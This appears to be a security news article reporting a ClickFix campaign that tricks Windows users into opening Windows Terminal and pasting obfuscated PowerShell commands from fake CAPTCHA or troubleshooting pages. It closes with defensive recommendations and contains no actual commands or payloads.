A new ClickFix social engineering campaign that exploits Windows Terminal to run malicious payloads on compromised systems has been discovered by security researchers. The activity, which was noticed by Microsoft Defender specialists in February 2026, demonstrates how attackers are improving their methods to evade common security detections and give users the impression that malicious instructions are more authentic. Social engineering is a major component of ClickFix attacks.

Attackers deceive victims into executing malicious commands on their own, rather than taking advantage of software flaws. Instead of using the conventional Windows Run dialog, the attackers in this campaign instructed victims to open Windows Terminal. This small adjustment makes it easier for the attack to blend in with regular administrative processes.

A Novel Method of Execution with Windows Terminal Victims of earlier ClickFix campaigns were typically told to hit Win + R, paste a command, and run it via the Run dialog. Monitoring systems and security tools are becoming more adept at identifying this pattern of behavior. Attackers now instruct victims to press Windows + X and then I to launch Windows Terminal (wt.exe) in order to circumvent those defenses.

Developers and administrators can run PowerShell, Command Prompt, and other shell environments using Windows Terminal, a valid command-line environment. Launching it does not seem suspicious at first because it is frequently used for system management tasks. This makes the method more convincing to users and harder for automated security systems to flag as malicious activity.

Windows Is the Target of the ClickFix Attack (Source: MsftSecIntel) The attacker instructs victims to paste a PowerShell command after the terminal opens. Usually obfuscated, these commands are intended to download or run more malware from distant servers. Attackers are able to gain an initial foothold on the system because the execution takes place directly within the terminal environment.

Lures of Social Engineering Deliver the Payload Deceptive websites and seemingly innocuous prompts are used to deliver the malicious instructions. Fake CAPTCHA pages, system verification messages, or troubleshooting instructions claiming the user must copy and paste a command to fix a problem or verify they are human may be encountered by victims. These prompts have been meticulously designed to resemble authentic technical instructions.

For instance, the page may state that the command is necessary to enable access to protected content, fix a connection problem, or validate the user's browser. Victims may follow the instructions without realizing they are running malicious code because they resemble standard troubleshooting procedures. Attackers have a number of advantages when they use Windows Terminal as the execution environment.

The technique bypasses security detections that focus on Run dialog abuse, MsftSecIntel reduces suspicion among users familiar with command-line tools, and provides a direct way to run PowerShell payloads with fewer restrictions. Security experts recommend that organizations educate users about copy-paste attacks and closely monitor suspicious PowerShell activity. Blocking untrusted scripts, restricting administrative command execution, and improving user awareness can help reduce the risk posed by evolving ClickFix campaigns.